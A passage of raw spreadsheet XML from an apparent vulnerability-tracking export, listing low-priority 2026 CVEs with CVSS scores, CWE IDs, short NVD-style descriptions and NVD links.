r="H1497" s="5" t="n"><v>0.003</v></c><c r="I1497" s="5" t="inlineStr" /><c r="J1497" s="5" t="inlineStr" /><c r="K1497" s="5" t="inlineStr" /><c r="L1497" s="5" t="inlineStr" /><c r="M1497" s="5" t="inlineStr" /><c r="N1497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1497" s="5" t="inlineStr" /><c r="R1497" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="S1497" s="5" t="inlineStr"><is><t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t></is></c><c r="T1497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t></is></c></row><row r="1498"><c r="A1498" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1498" s="5" t="inlineStr"><is><t>CVE-2026-69381</t></is></c><c r="D1498" s="5" t="n"><v>4.6</v></c><c r="E1498" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1498" s="5" t="inlineStr" /><c r="H1498" s="5" t="n"><v>0.004</v></c><c r="I1498" s="5" t="inlineStr" /><c r="J1498" s="5" t="inlineStr" /><c r="K1498" s="5" t="inlineStr" /><c r="L1498" s="5" t="inlineStr" /><c r="M1498" s="5" t="inlineStr" /><c r="N1498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1498" s="5" t="inlineStr" /><c r="R1498" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1498" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t></is></c></row><row r="1499"><c r="A1499" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1499" s="5" t="inlineStr"><is><t>CVE-2026-69548</t></is></c><c r="D1499" s="5" t="n"><v>4.6</v></c><c r="E1499" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1499" s="5" t="inlineStr" /><c r="H1499" s="5" t="n"><v>0.005</v></c><c r="I1499" s="5" t="inlineStr" /><c r="J1499" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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9" s="5" t="inlineStr" /><c r="M1499" s="5" t="inlineStr" /><c r="N1499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1499" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1499" s="5" t="inlineStr" /><c r="R1499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t></is></c></row><row r="1500"><c r="A1500" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1500" s="5" t="inlineStr"><is><t>CVE-2026-76959</t></is></c><c r="D1500" s="5" t="n"><v>4.6</v></c><c r="E1500" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1500" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1500" s="5" t="inlineStr" /><c r="H1500" s="5" t="n"><v>0.001</v></c><c r="I1500" s="5" t="inlineStr" /><c r="J1500" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1500" s="5" t="inlineStr" /><c r="L1500" s="5" t="inlineStr" /><c r="M1500" s="5" t="inlineStr" /><c r="N1500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1500" s="5" t="inlineStr" /><c r="R1500" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1500"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00" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t></is></c></row><row r="1501"><c r="A1501" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1501" s="5" t="inlineStr"><is><t>CVE-2026-78452</t></is></c><c r="D1501" s="5" t="n"><v>4.6</v></c><c r="E1501" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1501" s="5" t="inlineStr" /><c r="H1501" s="5" t="n"><v>0.005</v></c><c r="I1501" s="5" t="inlineStr" /><c r="J1501" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K150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501" s="5" t="inlineStr" /><c r="M1501" s="5" t="inlineStr" /><c r="N1501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1501" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1501" s="5" t="inlineStr" /><c r="R1501" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1501" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t></is></c></row><row r="1502"><c r="A1502" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1502" s="5" t="inlineStr"><is><t>CVE-2026-78508</t></is></c><c r="D1502" s="5" t="n"><v>4.6</v></c><c r="E1502" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1502" s="5" t="inlineStr" /><c r="H1502" s="5" t="n"><v>0.004</v></c><c r="I1502" s="5" t="inlineStr" /><c r="J1502" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K150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02" s="5" t="inlineStr" /><c r="M1502" s="5" t="inlineStr" /><c r="N1502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1502" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1502" s="5" t="inlineStr" /><c r="R1502" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1502" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t></is></c></row><row r="1503"><c r="A1503" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1503" s="5" t="inlineStr"><is><t>CVE-2026-78971</t></is></c><c r="D1503" s="5" t="n"><v>4.6</v></c><c r="E1503" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1503" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1503" s="5" t="inlineStr" /><c r="H1503" s="5" t="n"><v>0.002</v></c><c r="I1503" s="5" t="inlineStr" /><c r="J1503" s="5" t="inlineStr" /><c r="K1503" s="5" t="inlineStr" /><c r="L1503" s="5" t="inlineStr" /><c r="M1503" s="5" t="inlineStr" /><c r="N1503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1503" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1503" s="5" t="inlineStr" /><c r="R1503" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1503" s="5" t="inlineStr"><is><t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t></is></c><c r="T1503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t></is></c></row><row r="1504"><c r="A1504" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1504" s="5" t="inlineStr"><is><t>CVE-2026-0001</t></is></c><c r="D1504" s="5" t="n"><v>4.4</v></c><c r="E1504" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1504" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1504" s="5" t="inlineStr" /><c r="H1504" s="5" t="n"><v>0.002</v></c><c r="I1504" s="5" t="inlineStr" /><c r="J1504" s="5" t="inlineStr" /><c r="K1504" s="5" t="inlineStr" /><c r="L1504" s="5" t="inlineStr" /><c r="M1504" s="5" t="inlineStr" /><c r="N1504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1504" s="5" t="inlineStr" /><c r="R1504" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1504"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504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t></is></c></row><row r="1505"><c r="A1505" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1505" s="5" t="inlineStr"><is><t>CVE-2026-69713</t></is></c><c r="D1505" s="5" t="n"><v>4.4</v></c><c r="E1505" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1505" s="5" t="inlineStr" /><c r="H1505" s="5" t="n"><v>0.003</v></c><c r="I1505" s="5" t="inlineStr" /><c r="J1505" s="5" t="inlineStr" /><c r="K1505" s="5" t="inlineStr" /><c r="L1505" s="5" t="inlineStr" /><c r="M1505" s="5" t="inlineStr" /><c r="N1505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1505" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1505" s="5" t="inlineStr" /><c r="R1505" s="5" t="inlineStr" /><c r="S1505" s="5" t="inlineStr"><is><t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t></is></c></row><row r="1506"><c r="A1506" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1506" s="5" t="inlineStr"><is><t>CVE-2026-72980</t></is></c><c r="D1506" s="5" t="n"><v>4.4</v></c><c r="E1506" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1506" s="5" t="inlineStr" /><c r="H1506" s="5" t="n"><v>0.003</v></c><c r="I1506" s="5" t="inlineStr" /><c r="J1506" s="5" t="inlineStr" /><c r="K1506" s="5" t="inlineStr" /><c r="L1506" s="5" t="inlineStr" /><c r="M1506" s="5" t="inlineStr" /><c r="N1506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1506" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1506" s="5" t="inlineStr" /><c r="R1506" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S1506" s="5" t="inlineStr"><is><t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t></is></c></row><row r="1507"><c r="A1507" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1507" s="5" t="inlineStr"><is><t>CVE-2026-28627</t></is></c><c r="D1507" s="5" t="n"><v>4.3</v></c><c r="E1507" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1507" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1507" s="5" t="inlineStr" /><c r="H1507" s="5" t="n"><v>0.002</v></c><c r="I1507" s="5" t="inlineStr" /><c r="J1507" s="5" t="inlineStr" /><c r="K1507" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1507" s="5" t="inlineStr" /><c r="M1507" s="5" t="inlineStr" /><c r="N1507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1507" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1507" s="5" t="inlineStr" /><c r="R1507" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1507" s="5" t="inlineStr"><is><t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t></is></c></row><row r="1508"><c r="A1508" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1508" s="5" t="inlineStr"><is><t>CVE-2026-45527</t></is></c><c r="D1508" s="5" t="n"><v>4.3</v></c><c r="E1508" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1508" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1508" s="5" t="inlineStr" /><c r="H1508" s="5" t="n"><v>0.003</v></c><c r="I1508" s="5" t="inlineStr" /><c r="J1508" s="5" t="inlineStr" /><c r="K1508" s="5" t="inlineStr" /><c r="L1508" s="5" t="inlineStr" /><c r="M1508" s="5" t="inlineStr" /><c r="N1508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1508" s="5" t="inlineStr" /><c r="R1508" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1508" s="5" t="inlineStr"><is><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is></c><c r="T1508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t></is></c></row><row r="1509"><c r="A1509" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1509" s="5" t="inlineStr"><is><t>CVE-2026-53638</t></is></c><c r="D1509" s="5" t="n"><v>4.3</v></c><c r="E1509" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1509" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1509" s="5" t="inlineStr" /><c r="H1509" s="5" t="n"><v>0.002</v></c><c r="I1509" s="5" t="inlineStr" /><c r="J1509" s="5" t="inlineStr" /><c r="K1509" s="5" t="inlineStr" /><c r="L1509" s="5" t="inlineStr" /><c r="M1509" s="5" t="inlineStr" /><c r="N1509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1509" s="5" t="inlineStr" /><c r="R1509" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1509" s="5" t="inlineStr"><is><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is></c><c r="T1509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t></is></c></row><row r="1510"><c r="A1510" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1510" s="5" t="inlineStr"><is><t>CVE-2026-73019</t></is></c><c r="D1510" s="5" t="n"><v>4.3</v></c><c r="E1510" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1510" s="5" t="inlineStr" /><c r="H1510" s="5" t="n"><v>0.007</v></c><c r="I1510" s="5" t="inlineStr" /><c r="J1510" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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10" s="5" t="inlineStr" /><c r="M1510" s="5" t="inlineStr" /><c r="N1510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1510" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1510" s="5" t="inlineStr" /><c r="R1510" s="5" t="inlineStr"><is><t>CWE-41</t></is></c><c r="S1510" s="5" t="inlineStr"><is><t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t></is></c></row><row r="1511"><c r="A1511" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1511" s="5" t="inlineStr"><is><t>CVE-2026-76962</t></is></c><c r="D1511" s="5" t="n"><v>4.3</v></c><c r="E1511" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1511" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1511" s="5" t="inlineStr" /><c r="H1511" s="5" t="n"><v>0.002</v></c><c r="I1511" s="5" t="inlineStr" /><c r="J1511" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1511" s="5" t="inlineStr" /><c r="L1511" s="5" t="inlineStr" /><c r="M1511" s="5" t="inlineStr" /><c r="N1511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1511" s="5" t="inlineStr" /><c r="R1511" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1511" s="5" t="inlineStr"><is><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is></c><c r="T1511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t></is></c></row><row r="1512"><c r="A1512" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1512" s="5" t="inlineStr"><is><t>CVE-2026-76963</t></is></c><c r="D1512" s="5" t="n"><v>4.3</v></c><c r="E1512" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1512" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1512" s="5" t="inlineStr" /><c r="H1512" s="5" t="n"><v>0.002</v></c><c r="I1512" s="5" t="inlineStr" /><c r="J1512" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1512" s="5" t="inlineStr" /><c r="L1512" s="5" t="inlineStr" /><c r="M1512" s="5" t="inlineStr" /><c r="N1512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1512" s="5" t="inlineStr" /><c r="R1512" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1512" s="5" t="inlineStr"><is><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is></c><c r="T1512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t></is></c></row><row r="1513"><c r="A1513" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1513" s="5" t="inlineStr"><is><t>CVE-2026-76977</t></is></c><c r="D1513" s="5" t="n"><v>4.3</v></c><c r="E1513" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1513" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1513" s="5" t="inlineStr" /><c r="H1513" s="5" t="n"><v>0.002</v></c><c r="I1513" s="5" t="inlineStr" /><c r="J1513" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1513" s="5" t="inlineStr" /><c r="L1513" s="5" t="inlineStr" /><c r="M1513" s="5" t="inlineStr" /><c r="N1513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1513" s="5" t="inlineStr" /><c r="R1513" s="5" t="inlineStr"><is><t>CWE-1289</t></is></c><c r="S1513" s="5" t="inlineStr"><is><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is></c><c r="T1513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t></is></c></row><row r="1514"><c r="A1514" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1514" s="5" t="inlineStr"><is><t>CVE-2026-78455</t></is></c><c r="D1514" s="5" t="n"><v>4.3</v></c><c r="E1514" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1514" s="5" t="inlineStr" /><c r="H1514" s="5" t="n"><v>0.005</v></c><c r="I1514" s="5" t="inlineStr" /><c r="J1514" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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514" s="5" t="inlineStr" /><c r="M1514" s="5" t="inlineStr" /><c r="N1514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1514" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1514" s="5" t="inlineStr" /><c r="R1514" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1514" s="5" t="inlineStr"><is><t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t></is></c></row><row r="1515"><c r="A1515" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1515" s="5" t="inlineStr"><is><t>CVE-2026-78516</t></is></c><c r="D1515" s="5" t="n"><v>4.3</v></c><c r="E1515" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1515" s="5" t="inlineStr" /><c r="H1515" s="5" t="n"><v>0.005</v></c><c r="I1515" s="5" t="inlineStr" /><c r="J1515" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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15" s="5" t="inlineStr" /><c r="M1515" s="5" t="inlineStr" /><c r="N1515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1515" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1515" s="5" t="inlineStr" /><c r="R1515" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1515" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t></is></c></row><row r="1516"><c r="A1516" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1516" s="5" t="inlineStr"><is><t>CVE-2026-79588</t></is></c><c r="D1516" s="5" t="n"><v>4.3</v></c><c r="E1516" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1516" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1516" s="5" t="inlineStr" /><c r="H1516" s="5" t="n"><v>0.001</v></c><c r="I1516" s="5" t="inlineStr" /><c r="J1516" s="5" t="inlineStr" /><c r="K1516" s="5" t="inlineStr" /><c r="L1516" s="5" t="inlineStr" /><c r="M1516" s="5" t="inlineStr" /><c r="N1516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1516" s="5" t="inlineStr" /><c r="R1516" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="S1516" s="5" t="inlineStr"><is><t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t></is></c><c r="T1516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t></is></c></row><row r="1517"><c r="A1517" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1517" s="5" t="inlineStr"><is><t>CVE-2026-79603</t></is></c><c r="D1517" s="5" t="n"><v>4.3</v></c><c r="E1517" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1517" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1517" s="5" t="inlineStr" /><c r="H1517" s="5" t="n"><v>0.002</v></c><c r="I1517" s="5" t="inlineStr" /><c r="J1517" s="5" t="inlineStr" /><c r="K1517" s="5" t="inlineStr" /><c r="L1517" s="5" t="inlineStr" /><c r="M1517" s="5" t="inlineStr" /><c r="N1517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1517" s="5" t="inlineStr" /><c r="R1517" s="5" t="inlineStr"><is><t>CWE-664</t></is></c><c r="S1517" s="5" t="inlineStr"><is><t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t></is></c><c r="T1517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t></is></c></row><row r="1518"><c r="A1518" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1518" s="5" t="inlineStr"><is><t>CVE-2026-86736</t></is></c><c r="D1518" s="5" t="n"><v>4.3</v></c><c r="E1518" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1518" s="5" t="inlineStr" /><c r="H1518" s="5" t="n"><v>0.002</v></c><c r="I1518" s="5" t="inlineStr" /><c r="J1518" s="5" t="inlineStr" /><c r="K1518" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1518" s="5" t="inlineStr" /><c r="M1518" s="5" t="inlineStr" /><c r="N1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1518" s="5" t="inlineStr" /><c r="R1518" s="5" t="inlineStr"><is><t>CWE-682</t></is></c><c r="S1518" s="5" t="inlineStr"><is><t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t></is></c><c r="T1518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t></is></c></row><row r="1519"><c r="A1519" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1519" s="5" t="inlineStr"><is><t>CVE-2026-86853</t></is></c><c r="D1519" s="5" t="n"><v>4.3</v></c><c r="E1519" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1519" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1519" s="5" t="inlineStr" /><c r="H1519" s="5" t="n"><v>0.002</v></c><c r="I1519" s="5" t="inlineStr" /><c r="J1519" s="5" t="inlineStr" /><c r="K1519" 